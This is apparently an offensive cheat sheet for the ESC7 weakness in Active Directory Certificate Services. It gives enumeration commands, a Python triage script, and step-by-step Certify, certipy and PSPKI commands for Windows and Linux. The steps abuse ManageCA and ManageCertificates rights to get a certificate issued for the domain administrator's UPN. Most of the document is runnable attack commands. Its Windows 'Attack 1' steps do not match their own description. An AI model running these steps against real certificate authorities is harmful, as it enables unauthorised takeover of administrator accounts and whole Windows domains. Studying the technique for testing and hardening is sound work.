ESC7
Vulnerable Certificate Authority Access Control
ESC7 covers two CA-level permissions that pose a security risk when held by low-privileged principals:
- ManageCA ("Manage CA" in certsrv.msc, the CA Administrator role)
- ManageCertificates ("Issue and Manage Certificates" in certsrv.msc, the Certificate Manager / certificate officer role)
Enumerate CA permissions with certsrv.msc (CA Properties > Security tab) or with PSPKI:
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -expand Access
Query the CA's EditFlags registry value with certutil. EDITF_ATTRIBUTESUBJECTALTNAME2 is the 0x40000 (262144) bit: with the default flags, EditFlags reads 0x11014e (1114446) when the flag is clear and 0x15014e (1376590) when it is set. certutil also lists the names of the EDITF_* flags that are set, so look for EDITF_ATTRIBUTESUBJECTALTNAME2 in the output.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.minions.com\CA-minions" -getreg "policy\EditFlags"
Enumerate using the PSPKI module (Install-Module PSPKI first if it is not present)
PS /home/bobbuilder> Import-Module PSPKI
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.minions.com | Get-CertificationAuthorityAcl | select -ExpandProperty access
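The commands above return raw values from the CA. As an added example (not part of this cheat sheet), the following Python script turns them into an ESC7 triage: it parses the EditFlags line that certutil prints, checks the EDITF_ATTRIBUTESUBJECTALTNAME2 bit, computes the set and cleared values (1376590 and 1114446 with the default flags), and reports ManageCa / ManageCertificates holders outside the built-in admin groups. The certutil text and the rights-to-principals dictionary are constructed samples; the dictionary's key names are assumed to mirror the "Access Rights" section of certipy's find output, and the built-in admin set is a simplification of what a real CA grants by default.

```python
import re

# Bit abused by ESC6/ESC7: EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000 (262144).
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

# Constructed sample of what `certutil -getreg policy\\EditFlags` prints
# when the flag is set (0x15014e = 1376590 with the default flags).
CERTUTIL_SAMPLE = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-minions\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
CertUtil: -getreg command completed successfully.
"""

# Constructed rights -> principals map; key names are assumed to mirror the
# "Access Rights" section of `certipy find` output.
ACL_SAMPLE = {
    "ManageCa": ["MINIONS\\Administrators", "MINIONS\\Domain Admins", "MINIONS\\user1"],
    "ManageCertificates": ["MINIONS\\Administrators", "MINIONS\\Domain Admins",
                           "MINIONS\\Enterprise Admins"],
    "Enroll": ["MINIONS\\Authenticated Users"],
}

# Groups that hold ManageCa/ManageCertificates on a default install (simplified assumption).
DEFAULT_CA_ADMINS = {"administrators", "domain admins", "enterprise admins"}

_EDITFLAGS_RE = re.compile(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)\s*\((\d+)\)")


def parse_editflags(certutil_output: str) -> int:
    """Extract the EditFlags DWORD; certutil prints it as hex followed by decimal."""
    match = _EDITFLAGS_RE.search(certutil_output)
    if match is None:
        raise ValueError("no EditFlags REG_DWORD line in certutil output")
    hex_value, dec_value = int(match.group(1), 16), int(match.group(2))
    if hex_value != dec_value:  # sanity check that both renderings agree
        raise ValueError(f"hex {hex_value:#x} and decimal {dec_value} disagree")
    return hex_value


def san_flag_set(editflags: int) -> bool:
    """True when the CA honours a requester-supplied SAN on any template."""
    return bool(editflags & EDITF_ATTRIBUTESUBJECTALTNAME2)


def with_san_flag(editflags: int, enabled: bool) -> int:
    """Value to write back to EditFlags to set (attack) or clear (cleanup) the bit."""
    if enabled:
        return editflags | EDITF_ATTRIBUTESUBJECTALTNAME2
    return editflags & ~EDITF_ATTRIBUTESUBJECTALTNAME2


def esc7_principals(access_rights: dict) -> dict:
    """Return {right: [principals]} for ManageCa/ManageCertificates held outside the default admin groups."""
    findings = {}
    for right in ("ManageCa", "ManageCertificates"):
        risky = [p for p in access_rights.get(right, [])
                 if p.split("\\")[-1].lower() not in DEFAULT_CA_ADMINS]
        if risky:
            findings[right] = risky
    return findings


if __name__ == "__main__":
    flags = parse_editflags(CERTUTIL_SAMPLE)
    print(f"EditFlags = {flags:#x} ({flags}); SAN flag set: {san_flag_set(flags)}")
    print(f"value to restore after the attack: {with_san_flag(flags, False)}")
    for right, principals in esc7_principals(ACL_SAMPLE).items():
        print(f"ESC7: {right} held by non-default principal(s): {', '.join(principals)}")
```

Paste the real certutil output into `parse_editflags` and the real CA ACL into `esc7_principals`; the hex/decimal cross-check guards against a mis-copied line, and `with_san_flag(flags, False)` gives the exact value to write back during cleanup.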
Windows
Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)
A principal with ManageCA can change CA settings remotely with PSPKI, including toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (the same misconfiguration abused in ESC6). Once the flag is active, the CA honours a requester-supplied SAN on requests from any template. ESC6 was patched by the May 2022 Windows updates, so against an updated CA Attack 2 is the better option.
Note: the new flag value takes effect only after the CA service (CertSvc) is restarted. ManageCA does not allow restarting the service remotely, so the change waits for the next restart of CertSvc.
With the flag active, a request from any template can carry a SAN for another principal (Certify's /altname option); the steps below show the request, approve and download cycle with Certify and PSPKI.
- Request a certificate from a template that requires CA certificate manager approval (ApprovalNeeded is the template name used here); the request stays pending
PS /home/bobbuilder> .\certify.exe request /ca:<ca_name> /template:ApprovalNeeded
- Import the PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
- Approve the pending request by its request ID (requires the ManageCertificates right)
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest
- Download the issued certificate by request ID
PS /home/bobbuilder> .\certify.exe download /ca:<ca_name> /id:1
Post Attack
Restore the original EditFlags value (1114446 = 0x11014e, i.e. EDITF_ATTRIBUTESUBJECTALTNAME2 cleared) with PowerShell through PSPKI's CA registry manager; the same object, called with 1376590, is what sets the flag during the attack. Read the value back to confirm.
PS /home/bobbuilder> $ConfigReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "dc.minions.com"
PS /home/bobbuilder> $ConfigReader.SetRootNode($true)
PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
Attack 2 (gain ManageCertificates right using ManageCA)
Only the ManageCA permission is needed as a starting point. The attack also requires the ManageCertificates right and the SubCA certificate template enabled on the CA, and ManageCA is enough to set up both.
- Grant ourselves the Manage Certificates right by adding the user as a CA officer (skip if already held)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -add-officer user1 -username user1@minions.com -password password1
- Enable the SubCA certificate template on the CA (optional, SubCA is enabled by default)
PS /home/bobbuilder> .\certipy.exe ca -username user1@minions.com -password password1 -target-ip <ip> -ca '<ca_name>' -enable-template 'SubCA'
- Request a certificate from the SubCA template with the target's UPN in the SAN. By default only administrators may enroll in SubCA, so the request is denied, but it is kept on the CA with a request ID
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template SubCA -upn administrator@minions.com
- Issue the denied request (possible with the ManageCertificates right)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -issue-request 1 -username user1@minions.com -password password1
- Retrieve the issued certificate by request ID; the resulting certificate authenticates as the UPN in the SAN
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -retrieve 1
Linux
Attack 1 (ManageCA rights)
- Grant user1 the Manage Certificates right by adding it as a CA officer
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -add-officer user1
- Request a certificate with a SAN from the SubCA template (Enrollee Supplies Subject: True); the request is denied by default but stays on the CA with a request ID
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template SubCA -upn Administrator
- Issue the denied request
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
- Retrieve the certificate by its request ID and authenticate with it
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1
Attack 2 (ManageCertificates rights)
- Request a certificate from a template that requires CA certificate manager approval, with the target UPN in the SAN; the request is left pending
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template> -upn Administrator
- Approve the pending request by its request ID
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
- Retrieve the approved certificate
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1